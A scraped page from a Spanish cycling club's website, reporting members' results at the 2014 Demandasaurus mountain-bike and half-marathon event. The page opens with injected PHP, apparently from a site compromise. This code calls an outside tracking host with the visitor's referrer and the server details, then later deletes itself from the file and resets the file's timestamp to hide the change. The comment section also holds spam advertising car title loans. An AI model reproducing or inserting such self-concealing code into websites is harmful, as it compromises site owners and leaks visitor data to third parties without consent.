check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Demandasaurus 2014, declaración de intenciones

La Afición

Calendario

<<  Marzo 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
    1  2  3  4  5
  6  7  8  9101112
13141516171819
20212223242526
2728293031  
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Demandasaurus 2014, declaración de intenciones PDF Imprimir E-mail
Jueves, 16 de Octubre de 2014 22:27

Fiel a su cita con esta prueba en la vecina localidad de Salas de los Infantes, el CDS BTT estaba representado por Alex, Javi Vargas, Alber y Jesu en la modalidad reina de 50 km, con Kamila y Cesar en btt 20km, Elena y Rodrigo en la marcha btt de 5 km, y Vicen en la media maraton (23,5k,).
La prueba de btt 50km no presentaba grandes dificultades sobre el papel,( 50 km y unos 800 metros de desnivel ), pero las intensas lluvias de los días precedentes y el riesgo de nuevas precipitaciones durante la jornada hacían preveer que los bikers deberían dar lo mejor de sí mismos si querían conseguir una buena posición.



La organización tenía preparado un circuito divertido y variado, con bonitos senderos alternados con caminos y pistas forestales. La salida se produjo a las 10 horas, con más de 200 participantes, y el ritmo desde el inicio fué elvedo, pese a las condiciones del circuito, con barro abundante y charcos que en algunos casos eran pequeños lagos.

Alex cogió enseguida la vanguardia de la carrera, midiendose con sus rivales naturales, siempre con el top 20 en el punto de mira. Un poco más retrasados Javi, Alber y Jesu salían con ganas de apuntar a la zona alta de la clasificación, y en los primeros compases este ultimo abría una pequeña brecha que conservó durante toda la carrera con respecto a sus 2 compañeros de equipo. Su nueva montura y las ganas de compensar una campaña discreta hicieron que Jesu, pese a perder posiciones en las bajadas, pelease los puestos en cada subida o zona de exigencia física. Alex en cabeza dio batalla como en él es habitual, teniendo cada vez más cerca a los capos del panorama provincial. Alber y Javi por su parte apretaban fuerte y siguen confirmando su buen estado de forma, al que suman habilidad y pericia en terrenos rotos y bajadas técnicas.

Finalmente la carrera arrojó el que quizá haya sido hasta la fecha el mejor resultado del CDS BTT en su conjunto en una prueba. Los riders silenses dieron lo mejor de sí mismos y supieron cuidar sus mecánicas en una jornada complicada. Toda una declaración de intenciones que espolea, aún más si cabe, a los miembros del Club para nuevas citas. Las posiciones fueron: Alex 18, Jesu 32, Javi 35 y Alber41.

 

En el recorrido de 29 kms BTT, destacar el debut de Kamila, no muy afortunado puesto que a mitad de carrera tuvo un problema mecanico que la obligó a abandonar, desde el CD Silos la animamos a que siga intentandolo, esto acaba de empezar!!!. Cesar por su parte con pocos entrenamientos en las piernas terminó el recorrido corto que no es poco.

En categoria infantil esta vez tambien tuvimos representación silense con, Ines en su debut consiguió un segundo magnifico puesto en su categoria.

También representación silense en btt familiar, Rodrigo acompañado por Elena terminó todo el recorrido con gran ilusión y coraje.

En lo que respecta al medio maratón, Vicen llegaba casi sin preparación y con una inscripción un tanto precipitada, pero aún así se presentaba a la cita en Salas para representar al CDS en las mejores condiciones posibles. Desde el inicio intentó guardar fuerzas consciente de que la prueba se le haría larga debido al exigente perfil y complicado del terreno por las lluvias caidas y sobre todo al bajo estado de forma. Vicen completó la prueba manteniendose siempre en la zona media de los participantes y sin problemas importantes aunque empeorando el puesto conseguido el año pasado en la misma prueba, finalmente ocupó el puesto 56 de 106 finalistas.

¡ DEPORTIVO!

 

Comentarios  

 
0 #1 Arthur 12-01-2015 18:28
Also ask these business owners about how precisely
a brand of car title
loans: http://trusck.com/Trends/car-title-loans-temecula-ca-3/ can relate on the length of that loan offered.
Citar
 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.